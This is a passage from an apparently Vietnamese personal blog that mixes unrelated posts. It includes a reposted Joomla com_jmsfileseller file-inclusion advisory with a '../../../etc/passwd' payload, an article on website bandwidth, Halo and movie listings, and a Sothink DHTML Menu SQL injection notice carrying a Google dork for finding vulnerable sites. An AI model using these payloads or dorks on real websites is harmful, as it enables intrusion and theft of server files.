Trang

Thứ Bảy, 28 tháng 5, 2011

Joomla Component com_jmsfileseller Local File Inclusion Vulnerability

# Exploit Title: Joomla Component com_jmsfileseller Local File Inclusion Vulnerability
# Date: 28.05.2011
# Author: Valentin
# Category: webapps/0day
# Version: 1.0
 # Tested on:
# CVE : 
# Code :
 
 [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla Component com_msfileseller Local File Inclusion Vulnerability
Author = Valentin Hoebel
Contact = valentin@xenuser.org
 
 [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
>> Product informationName = JMS FileSeller
Vendor = Joommasters teamVendor Website = http://joommasters.com/
Affected Version(s) = 1.0
 
 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
>> Local File Inclusion
URL: index.php?option=com_jmsfileseller&view=<LFI value>&cat_id=1&Itemid=27
Vulnerable parameters: viewExample: index.php?option=com_jmsfileseller&view=../../../etc/passwd&cat_id=12&Itemid=27
 
 [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
>> Additional Information
Advisory/Exploit Published = 28.05.2011
 
 [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
>> Misc
Greetz = cr4wl3r, JosS, Todd and Josh from packetstormsecurity.org, exploit-db.com
 
 [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

Chủ Nhật, 8 tháng 5, 2011

Cơ bản về Bandwith

Khái niệm về Bandwith chắc các bạn đã nghe qua và có lẽ các bạn cũng không quan tâm nhiều đến điều nay khi xây dựng 1 website.
Riêng đối với tôi mấy hôm nay rất đâu đầu về chuyện này , website chứa cũng nhiều hình ảnh , vài ngày lại hết Bandwith . Site cá nhân nên hiện tại bỏ tiền ra thuê vps hay server riêng là điều quá lãng phí . Tìm hiểu gặp được bài viết cũng hay tuy nó không giải quyết được vấn đề tôi đang gặp phải nhưng cũng khá bổ ích (vấn đề tôi gặp phải chắc phải bỏ tiền túi ra thôi hì hì hì).


1/ Khái niệm :Trước hết, chúng ta hãy tìm hiểu nghĩa của từ này


Bandwidth, theo Lạc Việt Từ Điển có nghĩa là "dải tần ( dải tần số )", hay theo một số trang web thì nó là "băng thông". Thực ra nếu những ai hoạt động trong lĩnh vực viễn thông thì chắc sẽ hiểu rõ hơn về khái niệm này. Tuy nhiên, chúng ta hãy cùng nhau lướt qua 1 số định nghĩa về bandwidth :


- Khái niệm Bandwidth (the width of a band of electromagnetic frequencies) ( dịch nôm na là độ rộng của một dải tần số điện từ ), đại diện cho tốc độ truyền dữ liệu của một đường truyền, hay, chuyên môn một chút, là độ rộng (width) của một dải tần số mà các tính hiệu điện tử chiếm giữ trên một phương tiện truyền dẫn.


- Nói chung, bandwidth đồng nghĩa với số lượng dữ liệu được truyền trên một đơn vị thời gian. Bandwidth cũng đồng nghĩa với độ phức tạp của dữ liệu đối với khả năng của hệ thống. Ví dụ, trong 1 giây, download 1 bức ảnh sẽ tốn nhiều bandwidth hơn là download 1 trang văn bản thô ( chỉ có chữ ).


- Trong lĩnh vực viễn thông, bandwidth biểu diễn cho tốc độ truyền dữ liệu (tính theo bit) trên một giây ( thường gọi là bps ). Vì thế, một modem với 57,600 bps ( thường gọi là 56K modem ) có bandwidth gấp đôi so với 28,800 bps modem.

- Trong từng ngữ cảnh riêng, việc định nghĩa bandwidth lại khác đi một chút, nhưng chúng ta sẽ không đi quá sâu, mà hãy quay lại với những gì gần gũi với chúng ta, đó là bandwidth với máy chủ, tác động của nó tới trang web của chúng ta. Và vì vậy, chúng ta sẽ hiểu một cách đơn giản, càng có nhiều bandwidth, website của chúng ta càng có nhiều khả năng xử lý các yêu cầu trong một khoảng thời gian nhất định.



2/ Ước lượng bandwidth thích hợp cho website :

Khi lựa chọn 1 host ( xin giữ nguyên từ mà không dịch ), lượng bandwidth mà bạn mua đóng vai trò quan trọng trong việc thành công của website. Để trả lời cho câu hỏi " Bạn cần bao nhiêu bandwidth ", trước tiên, bạn cần giải quyết 2 vấn đề sau :


+ Ước lượng độ lớn của mỗi trang web ( ở đây là kích cỡ file tính theo byte )
+ Có bao nhiêu người sẽ xem ?


Chúng ta ước lượng độ lớn của một trang web ( cụ thể là 1 trang HTML ) bằng cách, cộng kích cỡ của tất cả hình ảnh trong trang web với kích cỡ của trang HTML. Sau đó chúng ta nhân con số tính được với số người dự tính sẽ xem trang web đó. Để dễ hiểu, chúng ta lấy một ví dụ. Bạn có 1 trang html có kích cỡ là 5k, trong đó có 3 file ảnh, mỗi file có độ lớn là 10K. Như vậy, bạn có 10+10+10+5 = 35k dữ liệu. Bạn ước lượng rằng sẽ có 1000 lượt người xem trang web đó trong 1 tháng, như thế, bandwidth trong một tháng của bạn sẽ là 35K*1000 = 35000K ( xấp xỉ 34MB ). Với 10 trang web như vậy, bạn tốn 340MB bandwidth .

Với cách tính như vậy, nếu website của bạn là website cá nhân, 500MB bandwidth là khá nhiều, nhưng vấn đề sẽ khác nếu bạn có một website lớn, nhiều người truy cập. Diendantinhoc.net cách đây 1 hay 2 tháng, với 10GB bandwidth, đã quá tải với hàng nghìn lượt truy cập trong 1 tháng , và không hoạt động được nữa, sau cùng họ phải bỏ bớt phòng chat đi để tiết kiệm bandwidth. Và nếu diendantinhoc.net là một website thương mại, thì chắc họ sẽ phải lỗ to khi ngưng hoạt động 1 thời gian như vậy ( May mắn là không ). Tiết kiệm là quốc sách ! Vậy làm thể nào để tiết kiệm ?



3 / Tiết kiệm bandwidth :

Có 3 điểm mấu chốt :

+ Giữ cho trang web của bạn càng nhỏ càng tốt : Điều ngày có nghĩa, hãy lưu ý kỹ đến mã HTML của bạn, cái gì bỏ đi được thì bỏ đi, loại bỏ các khoảng trắng không cần thiết,vv... ( thế mới thấy rõ hơn, HTML thật quan trọng :-p ). Nén hình ảnh của bạn tới mức có thể. Ví dụ khi thiết kế hình ảnh trong Photoshop, bạn có thể chọn chức năng save for web, và giảm chất lượng của nó đi miễn là hình ảnh vẫn còn chấp nhận được. Và, nên nhớ, dùng kiểu JPG cho các bức ảnh ( photos ), kiểu GIF cho các hình đồ hoạ ( graphics ).

+ Sử dụng những hình ảnh không lưu trữ trên máy chủ của bạn : Điều này là khá đơn giản, khi bạn tìm thấy 1 hình vừa ý ở 1 trang nào đó, thay vì download về và đưa lên máy chủ của mình, bạn chỉ việc trỏ thẳng tới địa chỉ của hình đó ( ví dụ

+ Sử dụng CSS ( Cascading Style Sheets ) : CSS là một trợ thủ đắc lực trong công cuộc tiết kiệm bandwidth. Thay vì phải gõ đi gõ lại nhiều lần một thuộc tính nào đó, bạn chỉ việc định dạng nó trong 1 file css, và điều này làm giảm kích cỡ của trang web. Tại sao lại không nghiên cứu CSS nhỉ ? .


4 / Ngăn chặn việc "đánh cắp bandwidth" :


Đây là một điều quan trọng, khi bạn vừa muốn giữ bản quyền hình ảnh, lại vừa muốn tiết kiệm bandwidth. Và đây là điều mà đại đa số các webmaster phải giải quyết.

+ Kiểm soát : Đây là một cách khá phổ biến. Kiểm soát bằng cách phân tích các máy tìm kiếm ( search engine ), các file log, và các website khác để xác định, nơi nào, ai, đã và đang xử dụng bandwidth của bạn mà chưa được phép.

Khi đã xác định được đối tượng, liên lạc với họ và yêu cầu họ ngừng lại việc vi phạm này. Thật tiếc là không phải cứ yêu cầu là được, mà có thể, họ sẽ cho bạn 1 bài học về cái gọi là "của chung" trên cộng đồng Internet, và nhất là khi ở Việt Nam, chẳng có điều luật nào đề cập đến vấn đề này, thật nan giải. Đây quả là một công việc tốn nhiều thời gian và công sức !.

+ Sử dụng các phần mềm :

Có khá nhiều phần mềm dành cho công việc này, mặc dù ở Việt Nam là chưa phổ biến, nhưng rất nổi tiếng và được nhắc đến rất nhiều, như WebTrends, Artistscope , Digimarc,vv...

+ Còn một số phương pháp nữa, hiệu quả hay không là tuỳ thuộc vào khả năng của bạn, ví dụ như dùng lệnh trong file .htaccess, hoặc sử dụng sức mạnh của các ngôn ngữ lập trình web như perl, php, vv...

5/ Kết :

Nếu bạn chỉ có ý định xây dựng 1 website cá nhân, đem vào đó những tâm tư, sở thích của mình, với vài chục người bạn ghé thăm, bạn không phải quá quan tâm tới vấn đề này. Nhưng xin hãy có 1 cái nhìn nghiêm túc nếu bạn muốn thực hiện một cái gì đó lớn hơn, thu hút nhiều người hơn, và nhất là khi bạn muốn trở thành 1 webmaster thực thụ .

Hiểu biết về bandwidth giúp bạn có chiến lược tốt hơn cho website của mình, dễ dàng lựa chọn khi đăng ký host, và tránh được nhưng rủi ro không đáng có.

Bạn có thể vào website http://bandwidth.com/ để tìm hiểu kỹ hơn về khái niệm này.


Sưu tầm từ internet.

Thứ Tư, 4 tháng 5, 2011

HALO legends (2010)

A collection of seven stories from the Halo Universe created by Japan's most creative minds. First up is "Origins" a two part episode showing the expansive history of the Halo Universe and the history of the 100,000 year long franchise timeline, told through the eyes of Cortana. Second comes "The Duel" Taking place long before the Human-Covenant War, it tells the story of an Arbiter, Fal 'Chavamee, who refuses to accept the Covenant Religion. Taking a turn to the Spartan side of the story "Homecoming" focuses on the tragedies involving the Spartan-II recruitment in 2517, and the Spartans coming to terms with their origins. Taking a turn in tone comes "Odd One Out" a non-cannon parody of the Halo storyline. "Prototype" tells the story of a Marine who goes against his orders to destroy an advanced prototype armor and uses the suit to buy time for civilians evacuating from the planet. "The Babysitter" tales of the the rivalry between the Spartan-II Commandos and the Orbital Drop Shock Troopers as they're sent to Covenant-controlled world to assassinate a Covenant Prophet. And finally "The Package" a two-part all CGI film follows Master Chief and an elite squad of Spartan-II super soldiers as they execute a top-secret mission to retrieve a highly valuable UNSC asset on a Covenant Assault Carrier.


Vietsub Halo Sub
----------------------------------------------------------------------------------------------------
Halo War 2009

1CD, 593.06 MB, Halo.Wars.2009.DVDRip.XviD-ViSiON
XviD, 720328, 2494kbps, MP3 160 kb/s
Halo wars 2009 
Halo wars 2009

 

Vietsub : Halo wars Sub

Arthur 3 The War Of The Two Worlds

Đạo diễn: Luc Besson
Diễn viên:  Selena Gomez, Freddie Highmore, Mia Farrow, Jimmy Fallon
Thể loại: Adventure | Family | Fantasy
Sản xuất: N/A
Quốc gia: Mỹ
Thời lượng: 129 Phút
Năm phát hành: 2010
Size: 700 MB


Plot: With Maltazard now 7 feet tall and Arthur still 2 inches small, our hero must find a way to grow back to his normal size ans stop the Evil M once and for all, with the help of Selenia and Betameche.
Trailer :

Password:phimrip.net
Subtitle: http://subscene.com/Arthur-3-The-War-of-the-Two-Worlds-Arthur-et-la-guerre-des-deux-mondes/subtitles-86318.aspx

Sothink DHTML Menu SQL Injection Vulnerability


# Exploit Title: dhtml-menu-builder SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Category:: webapps
# Google dork: http://www.google.com/#q=intext%3A%22Powered+by+dhtml-menu-builder.com%22+inurl%3A.asp%3Fid%3D&hl=en&biw=1280&bih=709&prmd=ivns&ei=xES_TdTxI4-58gPk_ozUBQ&start=20&sa=N&fp=4fb1180a34b58d1d
#Vendor: http://dhtml-menu-builder.com
# Tested on: [Windows Vista Edition Intégrale]
####
 ||>> Special Thanks To: All Exploit-Id Team
 [*] ## ExPLo!T:
 #  http://127.0.0.1/[File.asp]?id=SQLI
 #  http://127.0.0.1/[Path]/[File.asp]?id=SQLI